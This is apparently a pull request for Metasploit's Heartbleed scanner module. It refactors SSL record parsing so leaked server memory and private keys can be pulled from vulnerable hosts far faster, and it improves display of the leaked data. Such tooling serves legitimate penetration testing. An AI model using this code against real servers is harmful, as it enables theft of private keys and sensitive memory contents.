### PR TITLE
Dramatic speed-up in bleeding, improved verbose output of leaked data.

### DIFF
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -534,7 +534,7 @@ class Metasploit3 < Msf::Auxiliary
     # Keep this many duplicates as padding around the deduplication message
     duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round
 
-    # Remove duplicate characters 
+    # Remove duplicate characters
     abbreviated_data = printable_data.gsub(/(.)\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) { |s|
               s[0,duplicate_pad] +
               ' repeated ' + ( s.length - (2 * duplicate_pad) ).to_s + ' times ' +

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -71,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
     0x00ff  # Unknown
   ]
 
+  SSL_RECORD_HEADER_SIZE            = 0x05
   HANDSHAKE_RECORD_TYPE             = 0x16
   HEARTBEAT_RECORD_TYPE             = 0x18
   ALERT_RECORD_TYPE                 = 0x15
@@ -78,7 +79,6 @@ class Metasploit3 < Msf::Auxiliary
   HANDSHAKE_CERTIFICATE_TYPE        = 0x0b
   HANDSHAKE_KEY_EXCHANGE_TYPE       = 0x0c
   HANDSHAKE_SERVER_HELLO_DONE_TYPE  = 0x0e
-
 
   TLS_VERSION = {
     'SSLv3' => 0x0300,
@@ -98,6 +98,10 @@ class Metasploit3 < Msf::Auxiliary
 
   # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252
   SAFE_CHECK_MAX_RECORD_LENGTH = (1 << 14)
+
+  # For verbose output, deduplicate repeated characters beyond this threshold
+  DEDUP_REPEATED_CHARS_THRESHOLD = 400
+
 
   def initialize
     super(
@@ -203,10 +207,6 @@ class Metasploit3 < Msf::Auxiliary
 
   # Main method
   def run_host(ip)
-    # initial connect to get public key and stuff
-    connect_result = establish_connect
-    disconnect
-    return if connect_result.nil?
 
     case action.name
       when 'SCAN'
@@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary
       when 'DUMP'
         loot_and_report(bleed)  # Scan & Dump are similar, scan() records results
       when 'KEYS'
-        getkeys
+        get_keys
       else
         # Shouldn't get here, since Action is Enum
         print_error("Unknown Action: #{action.name}")
@@ -424,20 +424,15 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("#{peer} - Sending Client Hello...")
     sock.put(client_hello)
-    server_hello = get_data
-    unless server_hello
-      vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...")
-      return nil
-    end
 
-    server_resp_parsed = parse_ssl_record(server_hello)
+    server_resp = get_server_hello
 
-    if server_resp_parsed.nil?
+    if server_resp.nil?
       vprint_error("#{peer} - Server Hello Not Found")
       return nil
     end
 
-    server_resp_parsed
+    server_resp
   end
 
   # Generates a heartbeat request
@@ -455,7 +450,7 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("#{peer} - Sending Heartbeat...")
     sock.put(heartbeat_request(heartbeat_length))
-    hdr = get_data(5)
+    hdr = get_data(SSL_RECORD_HEADER_SIZE)
     if hdr.nil? || hdr.empty?
       vprint_error("#{peer} - No Heartbeat response...")
       disconnect
@@ -533,16 +528,34 @@ class Metasploit3 < Msf::Auxiliary
       print_status("#{peer} - Heartbeat data stored in #{path}")
     end
 
-    vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
+    # Convert non-printable characters to periods
+    printable_data = heartbeat_data.gsub(/[^[:print:]]/, '.')
+
+    # Keep this many duplicates as padding around the deduplication message
+    duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round
+
+    # Remove duplicate characters 
+    abbreviated_data = printable_data.gsub(/(.)\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) { |s|
+              s[0,duplicate_pad] +
+              ' repeated ' + ( s.length - (2 * duplicate_pad) ).to_s + ' times ' +
+              s[-duplicate_pad,duplicate_pad]
+    }
+
+    # Show abbreviated data
+    vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}")
 
   end
 
   #
-  # Keydumoing helper methods
+  # Keydumping helper methods
   #
 
   # Tries to retreive the private key
-  def getkeys
+  def get_keys
+    connect_result = establish_connect
+    disconnect
+    return if connect_result.nil?
+
     print_status("#{peer} - Scanning for private keys")
     count = 0
 
@@ -681,12 +694,33 @@ class Metasploit3 < Msf::Auxiliary
     ssl_record(HANDSHAKE_RECORD_TYPE, data)
   end
 
-  # Parse SSL header
-  def parse_ssl_record(data)
-    ssl_records = []
-    remaining_data = data
+  def get_ssl_record
+    hdr = get_data(SSL_RECORD_HEADER_SIZE)
+
+    unless hdr
+      vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...")
+      return nil
+    end
+
+    len = hdr.unpack('Cnn')[2]
+    data = get_data(len)
+
+    unless data
+      vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...")
+      return nil
+    end
+
+    hdr << data
+  end
+
+  # Get and parse server hello response until we hit Server Hello Done or timeout
+  def get_server_hello
+    server_done = nil
     ssl_record_counter = 0
-    while remaining_data && remaining_data.length > 0
+
+    remaining_data = get_ssl_record
+
+    while remaining_data and remaining_data.length > 0
       ssl_record_counter += 1
       ssl_unpacked = remaining_data.unpack('CH4n')
       return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3
@@ -702,17 +736,19 @@ class Metasploit3 < Msf::Auxiliary
       else
         ssl_data = remaining_data[5, ssl_len]
         handshakes = parse_handshakes(ssl_data)
-        ssl_records << {
-            :type => ssl_type,
-            :version => ssl_version,
-            :length => ssl_len,
-            :data => handshakes
-        }
+
+        # Stop once we receive a SERVER_HELLO_DONE
+        if handshakes and handshakes.length > 0 and handshakes[-1][:type] == HANDSHAKE_SERVER_HELLO_DONE_TYPE
+          server_done = true
+          break
+        end
+
       end
-      remaining_data = remaining_data[(ssl_len + 5)..-1]
+
+      remaining_data = get_ssl_record
     end
 
-    ssl_records
+    server_done
   end
 
   # Parse Handshake data returned from servers


### PR DESCRIPTION
Massive speed-up in bleeding out data by pulling and parsing SSL record headers and then pulling appropriate data lengths directly instead of waiting for a response timeout.

**Details**
- The existing code running against a straight SSL listener (so no callbacks) creates two connections, which incurs two RESPONSE_TIMEOUT penalties for every run. The default value for RESPONSE_TIMEOUT is 10 seconds, so with that default nearly 20 seconds is wasted on each run.
- The first of these connections (and therefore penalties) is unnecessary except for the "KEYS" action, so it can easily be moved from running for every action to only run for KEYS.
- More importantly, by parsing the server's SSL record lengths we can pull the appropriate amount of data directly without ever waiting for a timeout. This drops both connections from taking RESPONSE_TIMEOUT seconds to being nearly instant (i.e. as fast as you can send an SSL Client HELLO and receive a SERVER HELLO DONE).
- The function in question (establish_connect) is used by every action and callback option, so this speedup affects all aspects of the module, including hugely speeding up recovering private keys.
- Against a vulnerable straight SSL connection, there are no remaining inherent RESPONSE_TIMEOUT delays left unless the system does not return HEARTBEAT_LENGTH bytes of data. Even in this case, you can simply lower HEARTBEAT_LENGTH to be within the range of the data being returned. Once you do this, the heartbleed response from a vulnerable server is basically instant, bounded only by network latency.
- The verbose display of leaked memory was also changed to represent unprintable characters as periods instead of removing them altogether which caused things to run together in ways that made interesting data hard to spot. Long runs of repeated characters are replaced with a "repeated X times" message with some padding on each side so that relative spacing of leaked info is still clear but without overwhelming the user with junk data.
- Slightly better error checking. We now explicitly check that we've received a SERVER_HELLO_DONE.
- A few very minor typo / stylistic consistency changes

**Remaining Issues**
- Most or all of the callback handlers use similar unbounded get_data calls of their own which will each result in RESPONSE_TIMEOUT delays. I have not touched those functions, so at least those portions of the callbacks will remain slow.

**Testing**
- I have tested quite a bit against straight SSL listeners, but not at all against callbacks, so those should get tested thoroughly. Nothing that has been changed _should_ cause any problems with callbacks, but you never know.

If there's anything I've done that should be revamped, please let me know.
